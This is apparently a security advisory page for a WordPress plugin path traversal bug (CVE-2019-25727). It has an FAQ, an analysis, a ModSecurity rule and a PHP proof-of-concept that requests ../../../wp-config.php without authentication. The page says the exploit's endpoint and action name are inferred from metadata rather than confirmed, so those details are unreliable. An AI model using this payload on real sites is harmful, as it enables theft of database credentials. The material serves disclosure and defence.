What is CVE-2019-25727?

CVE-2019-25727 is a path traversal vulnerability in the 10WebAdManager plugin for WordPress, affecting versions up to and including 1.0.11. It allows unauthenticated attackers to read arbitrary files on the server, potentially exposing sensitive information.

How does the vulnerability work?

The vulnerability allows attackers to manipulate file paths supplied to the plugin’s file reading functions. By sending specially crafted requests, an attacker can traverse directories and access files like wp-config.php, which contains sensitive configuration data.

Who is affected by this vulnerability?

Any WordPress site using the 10WebAdManager plugin version 1.0.11 or earlier is vulnerable. Site administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the 10WebAdManager plugin installed on your WordPress site. If it is version 1.0.11 or earlier, your site is vulnerable and should be updated immediately.

What is the CVSS score for this vulnerability?

The CVSS score for CVE-2019-25727 is 5.3, which is classified as medium severity. This indicates a moderate risk level, suggesting that while exploitation is possible, it may require some effort.

What does the medium risk level mean in practical terms?

A medium risk level means that while the vulnerability can be exploited, the impact may be limited to confidentiality. However, successful exploitation can lead to serious consequences, such as exposing sensitive data.

How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the 10WebAdManager plugin to the latest version that addresses this issue. Additionally, implement input sanitization to prevent path traversal attacks.

What steps should I take if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin to prevent exploitation. You can also restrict access to the vulnerable AJAX endpoint using server-level configurations.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can send a POST request to the vulnerable AJAX endpoint with a crafted file path parameter. This allows the attacker to download sensitive files from the server without authentication.

What are the potential consequences of exploitation?

Successful exploitation can lead to unauthorized access to sensitive files, including database credentials and configuration files. This could result in a complete compromise of the WordPress site and its database.

Are there any specific files that are particularly at risk?

Files such as wp-config.php, .htaccess, and various log files are particularly at risk. These files can contain critical information that could be leveraged for further attacks on the WordPress installation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 13, 2026

CVE-2019-25727: 10WebAdManager <= 1.0.11 Unauthenticated Arbitrary File Download PoC, Patch Analysis & Rule

CVE ID CVE-2019-25727

Plugin ad-manager-wd

Severity Medium (CVSS 5.3)

CWE 22

Vulnerable Version 1.0.11

Patched Version —

Disclosed June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2019-25727 (metadata-based): This vulnerability affects the 10WebAdManager plugin (slug: ad-manager-wd) for WordPress, version 1.0.11 and earlier. It allows unauthenticated attackers to download arbitrary files from the server via a path traversal attack. The CVSS score is 5.3 (Medium), with a vector indicating network-based, low-complexity exploitation without authentication requirements. The impact is limited to confidentiality (low) with no integrity or availability impact.

The root cause is a path traversal vulnerability (CWE-22: Improper Limitation of a Pathname to a Restricted Directory). Based on Atomic Edge analysis, the likely vulnerable code involves a PHP function that reads a file path from a user-supplied parameter (likely via GET or POST) and passes it directly to file reading functions like file_get_contents(), readfile(), or include() without sanitizing path traversal sequences (e.g., ../). The plugin may use this functionality to serve files like downloads, logs, or cached data. Since no code diff is available, this is inferred from the CWE classification and common WordPress plugin patterns for file download handlers.

Exploitation requires only an HTTP request to a vulnerable endpoint. Atomic Edge research suggests the plugin likely registers an AJAX action, such as ad_manager_wd_download or a similar handler, accessible via /wp-admin/admin-ajax.php with the action parameter set accordingly. The attacker would append path traversal sequences like ../../../wp-config.php to a parameter that specifies the file path. Example: POST to /wp-admin/admin-ajax.php with action=ad_manager_wd_download&file=../../../wp-config.php. Since authentication is not required, any unauthenticated attacker can trigger this.

Remediation requires sanitizing file path inputs. The fix must strip or reject path traversal sequences (../) and validate that the resolved path falls within an allowed directory, such as the plugin’s own upload folder. WordPress functions like wp_normalize_path() and realpath() can help, combined with checks that the base directory matches. Atomic Edge recommends that the plugin explicitly whitelist allowed files or directories rather than relying on blacklisting.

Successful exploitation allows an attacker to read sensitive files including wp-config.php (containing database credentials), .htaccess files, logs, and other configuration files. This can lead to full database compromise and potential privilege escalation within the WordPress environment. The absence of authentication increases the risk, as any public visitor can trigger the download.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2019-25727 (metadata-based)
# Blocks unauthenticated path traversal via 10WebAdManager AJAX handler
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:201925727,phase:2,deny,status:403,chain,msg:'CVE-2019-25727 via 10WebAdManager AJAX',severity:'CRITICAL',tag:'CVE-2019-25727'"
  SecRule ARGS_POST:action "@streq ad_manager_wd_download" "chain"
    SecRule ARGS_POST:file "@rx ../" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2019-25727 - 10WebAdManager <= 1.0.11 - Unauthenticated Arbitrary File Download

// Configuration: Set the target WordPress site URL
$target_url = 'http://example.com'; // Change this to the target WordPress URL

// File to download (e.g., wp-config.php for database credentials)
$file_to_download = '../../../wp-config.php';

// The AJAX action used by the vulnerable plugin (inferred from plugin slug and common patterns)
$ajax_action = 'ad_manager_wd_download';

// Build the AJAX endpoint
$endpoint = $target_url . '/wp-admin/admin-ajax.php';

// Initialize cURL
$ch = curl_init();

// Set cURL options for POST request
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => $ajax_action,
    'file' => $file_to_download
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Skip SSL verification for testing
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL error: ' . curl_error($ch) . "n";
} else {
    // Output the response
    echo 'HTTP Status Code: ' . $http_code . "nn";
    echo 'Response Content:' . "n";
    echo $response;
}

// Close cURL session
curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2019-25727?
Understanding the vulnerability
CVE-2019-25727 is a path traversal vulnerability in the 10WebAdManager plugin for WordPress, affecting versions up to and including 1.0.11. It allows unauthenticated attackers to read arbitrary files on the server, potentially exposing sensitive information.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to manipulate file paths supplied to the plugin’s file reading functions. By sending specially crafted requests, an attacker can traverse directories and access files like wp-config.php, which contains sensitive configuration data.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the 10WebAdManager plugin version 1.0.11 or earlier is vulnerable. Site administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the 10WebAdManager plugin installed on your WordPress site. If it is version 1.0.11 or earlier, your site is vulnerable and should be updated immediately.
What is the CVSS score for this vulnerability?
Understanding severity ratings
The CVSS score for CVE-2019-25727 is 5.3, which is classified as medium severity. This indicates a moderate risk level, suggesting that while exploitation is possible, it may require some effort.
What does the medium risk level mean in practical terms?
Implications of risk assessment
A medium risk level means that while the vulnerability can be exploited, the impact may be limited to confidentiality. However, successful exploitation can lead to serious consequences, such as exposing sensitive data.
How can I fix or mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the 10WebAdManager plugin to the latest version that addresses this issue. Additionally, implement input sanitization to prevent path traversal attacks.
What steps should I take if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the plugin to prevent exploitation. You can also restrict access to the vulnerable AJAX endpoint using server-level configurations.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can send a POST request to the vulnerable AJAX endpoint with a crafted file path parameter. This allows the attacker to download sensitive files from the server without authentication.
What are the potential consequences of exploitation?
Understanding the risks
Successful exploitation can lead to unauthorized access to sensitive files, including database credentials and configuration files. This could result in a complete compromise of the WordPress site and its database.
Are there any specific files that are particularly at risk?
Sensitive files to be aware of
Files such as wp-config.php, .htaccess, and various log files are particularly at risk. These files can contain critical information that could be leveraged for further attacks on the WordPress installation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations